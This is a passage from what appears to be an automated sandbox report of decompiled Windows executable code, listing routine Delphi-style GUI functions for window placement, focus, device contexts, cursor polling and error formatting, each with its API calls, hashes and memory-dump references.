											E0043BC9C(_t111, 0, 8, 0);
										}
									}
									 *((intOrPtr*)(_t285->i + 0xf8))();
								} else {
									_t115 =  *0x466584; // 0x26e66a0
									__eflags = _t285 -  *((intOrPtr*)(_t115 + 0x68));
									if(_t285 !=  *((intOrPtr*)(_t115 + 0x68))) {
										goto L31;
									}
								}
							}
						} else {
							_t116 =  *0x466584; // 0x26e66a0
							__eflags = _t277 -  *((intOrPtr*)(_t116 + 0x64));
							if(_t277 !=  *((intOrPtr*)(_t116 + 0x64))) {
								goto L28;
							}
						}
					}
				} else {
					goto L56;
				}
			}
		}
		goto L58;
	} else {
		if(_t294 == 0) {
			_t132 = _v8;
			__eflags = ( *0x44f87c & 0x0000ffff) - ( *(_t132 + 0x1c) & 0x0000ffff &  *0x44f878);
			if(( *0x44f87c & 0x0000ffff) == ( *(_t132 + 0x1c) & 0x0000ffff &  *0x44f878)) {
				_t135 = _v8;
				__eflags = ( *(_t135 + 0x278) & 0x000000ff) - 0xffffffffffffffff;
				if(( *(_t135 + 0x278) & 0x000000ff) - 0xffffffffffffffff < 0) {
					_t148 = _v8;
					__eflags =  *((char*)(_t148 + 0x273)) - 2;
					if( *((char*)(_t148 + 0x273)) != 2) {
						_t149 = __edx[2];
						_t34 = _t149 + 0x18;
						 *_t34 =  *(_t149 + 0x18) | 0x00000002;
						__eflags =  *_t34;
					}
				}
				_t141 = ( *(_v8 + 0x278) & 0x000000ff) - 1;
				__eflags = _t141;
				if(_t141 == 0) {
					L45:
					_t144 = ( *(_v8 + 0x271) & 0x000000ff) - 2;
					__eflags = _t144;
					if(_t144 == 0) {
						L47:
						 *( *((intOrPtr*)(_t221 + 8)) + 0x18) =  *( *((intOrPtr*)(_t221 + 8)) + 0x18) | 0x00000001;
					} else {
						__eflags = _t144 == 3;
						if(_t144 == 3) {
							goto L47;
						}
					}
				} else {
					__eflags = _t141 == 2;
					if(_t141 == 2) {
						goto L45;
					}
				}
			}
			goto L58;
		} else {
			_t258 = _t242 + 0xfffffffa - 3;
			if(_t258 < 0) {
				__eflags =  *0x4626c0;
				if( *0x4626c0 != 0) {
					__eflags =  *__edx - 7;
					if( *__edx != 7) {
						goto L58;
					} else {
						_t150 = _v8;
						__eflags =  *(_t150 + 0x1c) & 0x00000010;
						if(( *(_t150 + 0x1c) & 0x00000010) != 0) {
							goto L58;
						} else {
							_t286 = 0;
							_t151 = _v8;
							__eflags =  *((char*)(_t151 + 0x277)) - 2;
							if( *((char*)(_t151 + 0x277)) != 2) {
								_t153 =  *(_v8 + 0x268);
								__eflags = _t153;
								if(_t153 != 0) {
									__eflags = _t153 - _v8;
									if(_t153 != _v8) {
										_t286 = E004423F8(_t153);
									}
								}
							} else {
								_t156 = E0045015C(_v8);
								__eflags = _t156;
								if(_t156 != 0) {
									_t286 = E004423F8(E0045015C(_v8));
								}
							}
							__eflags = _t286;
							if(_t286 == 0) {
								goto L58;
							} else {
								_t100 = SetFocus(_t286);
							}
						}
					}
				}
				goto L59;
			} else {
				_t259 = _t258 - 0x22;
				if(_t259 == 0) {
					_v24 = __edx[2];
					__eflags = _v24->i - 1;
					if(_v24->i != 1) {
						goto L58;
					} else {
						_t162 = _v8;
						__eflags =  *(_t162 + 0x290);
						if( *(_t162 + 0x290) == 0) {
							goto L58;
						} else {
							_t278 = E00433324( *((intOrPtr*)(_v8 + 0x290)), 0,  *((intOrPtr*)(_v24 + 8)));
							__eflags = _t278;
							if(_t278 == 0) {
								goto L58;
							} else {
								_v16 = E004262D8(0, 1);
								_push(_t289);
								_push(0x44f6c1);
								_push( *[fs:eax]);
								 *[fs:eax] = _t292;
								_v12 = SaveDC( *(_v24 + 0x18));
								_push(_t289);
								_push(0x44f6a4);
								_push( *[fs:eax]);
								 *[fs:eax] = _t292;
								E004268A4(_v16,  *(_v24 + 0x18));
								E00426738(_v16);
								E00434AAC(_t278, _v24 + 0x1c, _v16,  *(_v24 + 0x10) & 0x0000ffff);
								_pop(_t265);
								 *[fs:eax] = _t265;
								_push(0x44f6ab);
								__eflags = 0;
								E004268A4(_v16, 0);
								return RestoreDC( *(_v24 + 0x18), _v12);
							}
						}
					}
				} else {
					if(_t259 == 1) {
						_t287 = __edx[2];
						__eflags = _t287->i - 1;
						if(_t287->i != 1) {
							goto L58;
						} else {
							_t192 = _v8;
							__eflags =  *(_t192 + 0x290);
							if( *(_t192 + 0x290) == 0) {
								goto L58;
							} else {
								_t279 = E00433324( *((intOrPtr*)(_v8 + 0x290)), 0,  *((intOrPtr*)(_t287 + 8)));
								__eflags = _t279;
								if(_t279 == 0) {
									goto L58;
								} else {
									_v20 = GetWindowDC(E004423F8(_v8));
									 *[fs:eax] = _t292;
									_v16 = E004262D8(0, 1);
									 *[fs:eax] = _t292;
									_v12 = SaveDC(_v20);
									 *[fs:eax] = _t292;
									E004268A4(_v16, _v20);
									E00426738(_v16);
									 *((intOrPtr*)(_t279->i + 0x38))(_t287 + 0x10,  *[fs:eax], 0x44f7ab, _t289,  *[fs:eax], 0x44f7c8, _t289,  *[fs:eax], 0x44f7ef, _t289);
									_pop(_t273);
									 *[fs:eax] = _t273;
									_push(0x44f7b2);
									__eflags = 0;
									E004268A4(_v16, 0);
									return RestoreDC(_v20, _v12);
								}
							}
						}
					} else {
						L56:
						_t298 = _t100 -  *0x46658c; // 0xc075
						if(_t298 == 0) {
							E0043BC9C(_v8, 0, 0xb025, 0);
							E0043BC9C(_v8, 0, 0xb024, 0);
							E0043BC9C(_v8, 0, 0xb035, 0);
							E0043BC9C(_v8, 0, 0xb009, 0);
							E0043BC9C(_v8, 0, 0xb008, 0);
							E0043BC9C(_v8, 0, 0xb03d, 0);
						}
						L58:
						_t100 = E0043F7F4(_v8, _t221);
						L59:
						return _t100;
					}
				}
			}
		}
	}
}

                                                                            0x00000000
                                                                            0x0044f701
                                                                            0x0044f70f
                                                                            0x0044f71d
                                                                            0x0044f72c
                                                                            0x0044f73a
                                                                            0x0044f746
                                                                            0x0044f754
                                                                            0x0044f75d
                                                                            0x0044f770
                                                                            0x0044f783
                                                                            0x0044f788
                                                                            0x0044f78b
                                                                            0x0044f78e
                                                                            0x0044f793
                                                                            0x0044f798
                                                                            0x0044f7aa
                                                                            0x0044f7aa
                                                                            0x0044f6fb
                                                                            0x0044f6de
                                                                            0x0044f3dd
                                                                            0x0044f7f6
                                                                            0x0044f7f6
                                                                            0x0044f7fc
                                                                            0x0044f80a
                                                                            0x0044f81b
                                                                            0x0044f82c
                                                                            0x0044f83d
                                                                            0x0044f84e
                                                                            0x0044f85f
                                                                            0x0044f85f
                                                                            0x0044f864
                                                                            0x0044f869
                                                                            0x0044f86e
                                                                            0x0044f874
                                                                            0x0044f874
                                                                            0x0044f3d7
                                                                            0x0044f3d0
                                                                            0x0044f3cb
                                                                            0x0044f3bf

                                                                            APIs
                                                                            • SetFocus.USER32(00000000), ref: 0044F46F
                                                                            • SaveDC.GDI32(?), ref: 0044F62D
                                                                            • RestoreDC.GDI32(?,?), ref: 0044F69E
                                                                            • GetWindowDC.USER32(00000000), ref: 0044F70A
                                                                            • SaveDC.GDI32(?), ref: 0044F741
                                                                            • RestoreDC.GDI32(?,?), ref: 0044F7A5
                                                                            Strings
                                                                            • PSC , xrefs: 0044F60B, 0044F722
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: RestoreSave$FocusWindow
                                                                            • String ID: PSC
                                                                            • API String ID: 1553564791-3988711711
                                                                            • Opcode ID: 72769ad42fed0eb90a27f93b861efb011eea36f8f11b74f6851d10a0e592ddb5
                                                                            • Instruction ID: 0feb47b636321289c6b1ee835d5db488161481ff91a5fcd85071049a3d22871c
                                                                            • Opcode Fuzzy Hash: 72769ad42fed0eb90a27f93b861efb011eea36f8f11b74f6851d10a0e592ddb5
                                                                            • Instruction Fuzzy Hash: C9C16030A00204DFEB11EF69C586A6FB7F5EF49704F6544B6E804AB361DB38AE05DB18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                                                                                  E00442700(void* __eax) { 				void* _v28; 				struct _WINDOWPLACEMENT _v56; 				struct tagPOINT _v64; 				intOrPtr _v68; 				void* _t43; 				struct HWND__* _t45; 				struct tagPOINT* _t47;  				_t47 =  &(_v64.y); 				_t43 = __eax; 				if(IsIconic( *(__eax + 0x1b4)) == 0) { 					GetWindowRect( *(_t43 + 0x1b4), _t47); 				} else { 					_v56.length = 0x2c; 					GetWindowPlacement( *(_t43 + 0x1b4),  &_v56); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 				} 				if((GetWindowLongA( *(_t43 + 0x1b4), 0xfffffff0) & 0x40000000) != 0) { 					_t45 = GetWindowLongA( *(_t43 + 0x1b4), 0xfffffff8); 					if(_t45 != 0) { 						ScreenToClient(_t45, _t47); 						ScreenToClient(_t45,  &_v64); 					} 				} 				 *(_t43 + 0x40) = _t47->x; 				 *((intOrPtr*)(_t43 + 0x44)) = _v68; 				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x; 				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68; 				return L00439F28(_t43); 			}                        


                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 0044270F
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 0044272C
                                                                            • GetWindowRect.USER32 ref: 00442745
                                                                            • GetWindowLongA.USER32 ref: 00442753
                                                                            • GetWindowLongA.USER32 ref: 00442768
                                                                            • ScreenToClient.USER32 ref: 00442775
                                                                            • ScreenToClient.USER32 ref: 00442780
                                                                            Strings
                                                                            • , , xrefs: 00442718
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                            • String ID: ,
                                                                            • API String ID: 2266315723-3772416878
                                                                            • Opcode ID: ce15ff6008579e3d3c35e24131f4f0ecce661e0228d178844c8a078a25dbcd0e
                                                                            • Instruction ID: 282360e0af41cb553a3d796231ab277cfe4c42851b7561e00cc4fa463f4feb2e
                                                                            • Opcode Fuzzy Hash: ce15ff6008579e3d3c35e24131f4f0ecce661e0228d178844c8a078a25dbcd0e
                                                                            • Instruction Fuzzy Hash: EA117C71908340AFDB00DF6DC985A8B37D8AF49314F04467ABE58DB386D739E800CB66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 57%
                                                                                                                                  E00456830(void* __eax) { 				struct HWND__* _t21; 				intOrPtr* _t26; 				signed int _t29; 				intOrPtr* _t30; 				int _t33; 				intOrPtr _t36; 				void* _t54; 				int _t64;  				_t54 = __eax; 				_t21 = IsIconic( *(__eax + 0x30)); 				if(_t21 != 0) { 					SetActiveWindow( *(_t54 + 0x30)); 					if( *((intOrPtr*)(_t54 + 0x44)) == 0 ||  *((char*)(_t54 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t54 + 0x44)) + 0x57)) == 0) { 						L6: 						E004554C4( *(_t54 + 0x30), 9, __eflags); 					} else { 						_t64 = IsWindowEnabled(E004423F8( *((intOrPtr*)(_t54 + 0x44)))); 						if(_t64 == 0) { 							goto L6; 						} else { 							DefWindowProcA( *(_t54 + 0x30), 0x112, 0xf120, 0); 						} 					} 					_t26 =  *0x462c28; // 0x466310 					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1; 					if(_t64 < 0) { 						asm("adc eax, 0x0"); 					} 					_t30 =  *0x462c28; // 0x466310 					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1; 					if(_t64 < 0) { 						asm("adc eax, 0x0"); 					} 					SetWindowPos( *(_t54 + 0x30), 0, _t33, ??, ??, ??, ??); 					_t36 =  *((intOrPtr*)(_t54 + 0x44)); 					if(_t36 != 0 &&  *((char*)(_t36 + 0x273)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) { 						E00450A04(_t36, 0); 						E00453454( *((intOrPtr*)(_t54 + 0x44))); 					} 					E00455D1C(_t54); 					L00455DF8(_t54, 1); 					_t21 =  *0x466584; // 0x26e66a0 					_t59 =  *((intOrPtr*)(_t21 + 0x64)); 					if( *((intOrPtr*)(_t21 + 0x64)) != 0) { 						_t21 = SetFocus(E004423F8(_t59)); 					} 					if( *((short*)(_t54 + 0x14a)) != 0) { 						return  *((intOrPtr*)(_t54 + 0x148))(); 					} 				} 				return _t21; 			}                        


                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00456838
                                                                            • SetActiveWindow.USER32(?,?,?,?,00456232,00000000,00456706), ref: 00456849
                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045686C
                                                                            • DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00456232,00000000,00456706), ref: 00456885
                                                                            • SetWindowPos.USER32(?,00000000,00000000,?,?,00456232,00000000,00456706), ref: 004568CB
                                                                            • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00456232,00000000,00456706), ref: 00456919
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnabledFocusIconicProc
                                                                            • String ID:
                                                                            • API String ID: 848842217-0
                                                                            • Opcode ID: 1957795f184147772967dd2170243ba8589b1d82c817d7dd23442b436a3c44b5
                                                                            • Instruction ID: 0ae515bd5538cf6c2b81134375036770536a1319b9b68df56a487dd4935c93fd
                                                                            • Opcode Fuzzy Hash: 1957795f184147772967dd2170243ba8589b1d82c817d7dd23442b436a3c44b5
                                                                            • Instruction Fuzzy Hash: 68311270B012409BEB14BB69CD85B5A37986F04706F4904BAFD04DF2D7DA7DEC888719
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 81%
                                                                                                                                  E00441DD4(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) { 				void* _v20; 				struct _WINDOWPLACEMENT _v48; 				char _v64; 				int _t54; 				intOrPtr* _t55; 				int _t60; 				int _t62;  				_t60 = __ecx; 				_t62 = __edx; 				_t55 = __eax; 				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) { 					L4: 					if(E004426F4(_t55) == 0 || IsIconic( *(_t55 + 0x1b4)) != 0) { 						 *(_t55 + 0x40) = _t62; 						 *(_t55 + 0x44) = _t60; 						 *((intOrPtr*)(_t55 + 0x48)) = _a8; 						 *((intOrPtr*)(_t55 + 0x4c)) = _a4; 						if(E004426F4(_t55) != 0) { 							_v48.length = 0x2c; 							GetWindowPlacement( *(_t55 + 0x1b4),  &_v48); 							E0043A33C(_t55,  &_v64); 							asm("movsd"); 							asm("movsd"); 							asm("movsd"); 							asm("movsd"); 							SetWindowPlacement( *(_t55 + 0x1b4),  &_v48); 						} 					} else { 						SetWindowPos( *(_t55 + 0x1b4), 0, _t62, _t60, _a8, _a4, 0x14); 					} 					L00439F28(_t55); 					E0043D538(_t55); 					return  *((intOrPtr*)( *_t55 + 0x5c))(); 				} else { 					_t54 = _a4; 					if(_t54 ==  *((intOrPtr*)(__eax + 0x4c))) { 						return _t54; 					} 					goto L4; 				} 			}                        


                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00441E13
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00441E31
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00441E67
                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00441E8B
                                                                            Strings
                                                                            • , , xrefs: 00441E55
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Placement$Iconic
                                                                            • String ID: ,
                                                                            • API String ID: 568898626-3772416878
                                                                            • Opcode ID: b3f1f57aaca20093d57be3fc942e497ad33d81fce6295880f164f60f71fd4e0b
                                                                            • Instruction ID: 47f25ef3559f560daf95aef17050d8c5e2cd4fbc03fa61df4cfcf949f4803219
                                                                            • Opcode Fuzzy Hash: b3f1f57aaca20093d57be3fc942e497ad33d81fce6295880f164f60f71fd4e0b
                                                                            • Instruction Fuzzy Hash: 25215171A002049BDF54EF69C8C099E77A8AF49314F508466FE08EF356D77AEC448BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                                                                                  E00422EE0(void* __edi, struct HWND__* _a4, signed int _a8) { 				struct _WINDOWPLACEMENT _v48; 				void* __ebx; 				void* __esi; 				void* __ebp; 				signed int _t19; 				intOrPtr _t21; 				struct HWND__* _t23;  				_t19 = _a8; 				_t23 = _a4; 				if( *0x466339 != 0) { 					if((_t19 & 0x00000003) == 0) { 						if(IsIconic(_t23) == 0) { 							GetWindowRect(_t23,  &(_v48.rcNormalPosition)); 						} else { 							GetWindowPlacement(_t23,  &_v48); 						} 						return E00422E50( &(_v48.rcNormalPosition), _t19); 					} 					return 0x12340042; 				} 				_t21 =  *0x466314; // 0x422ee0 				 *0x466314 = E00422CE4(1, _t19, _t21, __edi, _t23); 				return  *0x466314(_t23, _t19); 			}                        

                                                                            Strings
                                                                            • MonitorFromWindow , xrefs: 00422EF7
                                                                            • .B , xrefs: 00422EFC, 00422F09, 00422F10
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: MonitorFromWindow$.B
                                                                            • API String ID: 190572456-3321143411
                                                                            • Opcode ID: dc8e35c407d82f6cceb83babe80fce9656be7aefb26f434311fe2d54a7a81e81
                                                                            • Instruction ID: 1636fd834bafad5518785d76de514a437e7accc22a945f91af0d7936cae42485
                                                                            • Opcode Fuzzy Hash: dc8e35c407d82f6cceb83babe80fce9656be7aefb26f434311fe2d54a7a81e81
                                                                            • Instruction Fuzzy Hash: 43018471A041687A9700EB54AF819AFB36CAB05304BC1412BF914A3242EBA89D0197BF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0045676C(void* __eax) {
    long _t21;
    int _t37;
    int _t39;
    struct HWND__* _t41;
    void* _t46;

    _t46 = __eax;
    _t1 = _t46 + 0x30; // 0x0
    _t21 = IsIconic( *_t1);
    if(_t21 == 0) {
        E00455CBC();
        _t2 = _t46 + 0x30; // 0x0
        SetActiveWindow( *_t2);
        L00455DF8(_t46, 0);
        if( *((intOrPtr*)(_t46 + 0x44)) == 0 ||  *((char*)(_t46 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t46 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E004423F8( *((intOrPtr*)(_t46 + 0x44)))) == 0) {
            _t15 = _t46 + 0x30; // 0x0
            _t21 = E004554C4( *_t15, 6, __eflags);
        } else {
            _t37 = E0044EDA8( *((intOrPtr*)(_t46 + 0x44)));
            _t39 = E0044ED88( *((intOrPtr*)(_t46 + 0x44)));
            _t41 = E004423F8( *((intOrPtr*)(_t46 + 0x44)));
            _t13 = _t46 + 0x30; // 0x0
            SetWindowPos( *_t13, _t41, _t39, _t37,  *( *((intOrPtr*)(_t46 + 0x44)) + 0x48), 0, 0x40);
            _t14 = _t46 + 0x30; // 0x0
            _t21 = DefWindowProcA( *_t14, 0x112, 0xf020, 0);
        }
        if( *((short*)(_t46 + 0x142)) != 0) {
            return  *((intOrPtr*)(_t46 + 0x140))();
        }
    }
    return _t21;
}

                                                                            APIs
                                                                            • IsIconic.USER32(00000000), ref: 00456773
                                                                            • SetActiveWindow.USER32(00000000,?,00456FB0), ref: 0045678B
                                                                              • Part of subcall function 00455DF8: EnumWindows.USER32(00455D88,00000000), ref: 00455E22
                                                                              • Part of subcall function 00455DF8: ShowOwnedPopups.USER32(00000000,?,00455D88,00000000,?,?,00460C02,00456799,00000000,?,00456FB0), ref: 00455E51
                                                                            • IsWindowEnabled.USER32(00000000), ref: 004567B7
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,00000000,00000040,00000000,00000000,?,00456FB0), ref: 004567EA
                                                                            • DefWindowProcA.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,00000000,00000000,?,00000000,00000040,00000000,00000000,?,00456FB0), ref: 004567FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
                                                                            • String ID:
                                                                            • API String ID: 2995439034-0
                                                                            • Opcode ID: cdb4102744cc381e5219f4535f74b344f238140cf9e233f1330de880dcf3e2ad
                                                                            • Instruction ID: 918584e1bd2c51baab3052e0e12fbe46b2eccfde8c42c3220052cef7c0f72eaf
                                                                            • Opcode Fuzzy Hash: cdb4102744cc381e5219f4535f74b344f238140cf9e233f1330de880dcf3e2ad
                                                                            • Instruction Fuzzy Hash: B011EF70A012009BEB54FF6ACAC6B5637A96F04305F4900BABE04DF29BD67DDC849728
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E004552FC(void* __edx) {
    struct tagPOINT _v12;
    void* _t5;
    long _t6;
    void* _t17;
    void* _t20;

    _t20 = __edx;
    *0x466590 = GetCurrentThreadId();
    L5:
    _t5 =  *0x466594; // 0x0
    _t6 = WaitForSingleObject(_t5, 0x64);
    if(_t6 == 0x102) {
        if( *0x466580 != 0 &&  *((intOrPtr*)( *0x466580 + 0x60)) != 0) {
            GetCursorPos( &_v12);
            if(E00438F60( &_v12) == 0) {
                L00457D90( *0x466580, _t17, _t20);
            }
        }
        goto L5;
    }
    return _t6;
}

                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00455308
                                                                            • GetCursorPos.USER32(?,00000000,00000064), ref: 00455325
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00455345
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CurrentCursorObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 1359611202-0
                                                                            • Opcode ID: df9f72933460e122f4bb00e301b80f85f47270db1344cf40ccb5259938aba5fc
                                                                            • Instruction ID: a4966ca5ceb9285837f0d491413ca76e03b52f42b844403012d5ccc626bb1a15
                                                                            • Opcode Fuzzy Hash: df9f72933460e122f4bb00e301b80f85f47270db1344cf40ccb5259938aba5fc
                                                                            • Instruction Fuzzy Hash: 69F0E9711043049BDB10E755E887B6973E8AB04355F41057BED09DA1D3FBBDA848C61E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0043F5F4(void* __eax, void* __ecx, void* __edx, void* __eflags) {
    intOrPtr _v16;
    char _v19;
    char _v20;
    signed int _v24;
    intOrPtr _v28;
    char _v32;
    char _v288;
    short _v292;
    char _v296;
    short _v298;
    short _v300;
    intOrPtr _v304;
    char _v308;
    signed int _t42;
    void* _t44;
    void* _t54;
    void* _t58;
    void* _t60;
    void* _t69;
    void* _t78;
    void* _t79;

    _t70 = __ecx;
    _t69 = __ecx;
    _t78 = __edx;
    _t79 = __eax;
    _v300 = E0040692C(GetMessagePos(), _t70);
    _v296 = _v300;
    _v292 = _v298;
    E0043A55C(_t79,  &_v296,  &_v296);
    if(_t69 == 0) {
        _t69 = E0043F530(_t79, 0,  &_v308, 0, 0);
    }
    if(_t69 == 0) {
        return 0;
    } else {
        if(_t79 == _t69) {
            _v32 = _v308;
            _v28 = _v304;
        } else {
            _v32 = _v308 -  *((intOrPtr*)(_t69 + 0x40));
            _v28 = _v304 -  *((intOrPtr*)(_t69 + 0x44));
        }
        _v24 =  *(_t78 + 8) & 0x0000ffff;
        _v16 =  *((intOrPtr*)(_t78 + 4));
        _t42 =  *(_t78 + 0xa) & 0x0000ffff;
        if(_t42 >= 0x201) {
            _t44 = _t42 + 0xfffffdff - 2;
            if(_t44 < 0) {
                goto L15;
            }
            _t54 = _t44 - 0xffffffffffffffff;
            if(_t54 < 0) {
                goto L17;
            }
            if(_t54 - 0xffffffffffffffff < 0) {
                goto L16;
            }
            goto L18;
        } else {
            _t58 = _t42 + 0xffffff5f - 2;
            if(_t58 < 0) {
                L15:
                _v20 = 0;
                L19:
                GetKeyboardState( &_v288);
                _v19 = E0044CD28( &_v288);
                *((intOrPtr*)(_t78 + 0xc)) = E0043BC9C(_t69, 0, 0xb04b,  &_v32);
                return 1;
            }
            _t60 = _t58 - 0xffffffffffffffff;
            if(_t60 < 0) {
                L17:
                _v20 = 1;
                goto L19;
            }
            if(_t60 - 0xffffffffffffffff < 0) {
                L16:
                _v20 = 2;
                goto L19;
            }
            L18:
            _v20 = 0;
            goto L19;
        }
    }
}

                                                                            APIs
                                                                            • GetMessagePos.USER32 ref: 0043F603
                                                                            • GetKeyboardState.USER32(?,?,?,?,0043FB78), ref: 0043F700
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: KeyboardMessageState
                                                                            • String ID:
                                                                            • API String ID: 3083355189-0
                                                                            • Opcode ID: b6d24466fa283e69023aa28bffdab9142aa89afd53d3c3f9af6c6c5c405a14b8
                                                                            • Instruction ID: 76d5227df02404bb1af155c9e6ea0e57d13ec3578cb87ddf304989c338bfe391
                                                                            • Opcode Fuzzy Hash: b6d24466fa283e69023aa28bffdab9142aa89afd53d3c3f9af6c6c5c405a14b8
                                                                            • Instruction Fuzzy Hash: 8F318C719087429AC724CF39C58679EBAD4AB8D314F005A3FE589C2291D738C80A879B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
E00426B6C(void* __ebx) {
    char _v260;
    char _v264;
    long _t21;
    void* _t22;
    intOrPtr _t27;
    void* _t32;

    _v264 = 0;
    _push(_t32);
    _push(0x426c08);
    _push( *[fs:eax]);
    *[fs:eax] = _t32 + 0xfffffefc;
    _t21 = GetLastError();
    if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
        E00426B18(_t22);
    } else {
        E004049AC( &_v264, 0x100,  &_v260);
        E0040C11C(_v264, 1);
        E00404184();
    }
    _pop(_t27);
    *[fs:eax] = _t27;
    _push(0x426c0f);
    return E0040473C( &_v264);
}

                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,00426C08), ref: 00426B8C
